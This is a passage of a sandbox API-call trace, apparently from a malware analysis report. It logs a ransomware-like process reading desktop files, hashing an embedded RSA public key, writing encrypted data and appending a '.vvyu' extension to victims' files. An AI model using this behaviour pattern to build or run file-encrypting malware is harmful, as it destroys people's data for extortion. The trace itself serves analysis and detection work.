lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.677] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.678] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.678] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.678] CloseHandle (hObject=0x568) returned 1 [0192.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0192.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e9ea68 [0192.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0192.683] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ldMOZunCS-h9r3 XU2.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\ldmozuncs-h9r3 xu2.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ldMOZunCS-h9r3 XU2.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ldmozuncs-h9r3 xu2.mp4.vvyu")) returned 1 [0192.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.689] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0192.691] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99916d00, ftCreationTime.dwHighDateTime=0x1d8a2b3, ftLastAccessTime.dwLowDateTime=0x78d77500, ftLastAccessTime.dwHighDateTime=0x1d8a709, ftLastWriteTime.dwLowDateTime=0x78d77500, ftLastWriteTime.dwHighDateTime=0x1d8a709, nFileSizeHigh=0x0, nFileSizeLow=0x12934, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nQrFKLA.gif", cAlternateFileName="")) returned 1 [0192.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e953c8 [0192.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0192.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e953c8 | out: hHeap=0x620000) returned 1 [0192.692] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\nQrFKLA.gif") returned=".gif" [0192.692] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\nQrFKLA.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\nqrfkla.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.692] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=76084) returned 1 [0192.693] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.695] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1290e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.695] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.697] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.697] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x12934, lpOverlapped=0x0) returned 1 [0192.698] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.698] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.698] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.698] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.699] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.699] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.699] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.699] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.699] GetLastError () returned 0x0 [0192.699] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.699] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.700] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.700] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.700] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12930) returned 0x2ea79b0 [0192.700] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e953c8 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95410 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.701] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ea68 [0192.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93690 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93678 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.705] GetCurrentThreadId () returned 0x66c [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e770 [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.706] GetCurrentThreadId () returned 0x66c [0192.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93690 [0192.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936f0 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93708 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936a8 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93678 [0192.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9ea68 [0192.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ec78 [0192.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0192.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ee90 [0192.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ec78 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee90 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95410 | out: hHeap=0x620000) returned 1 [0192.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: 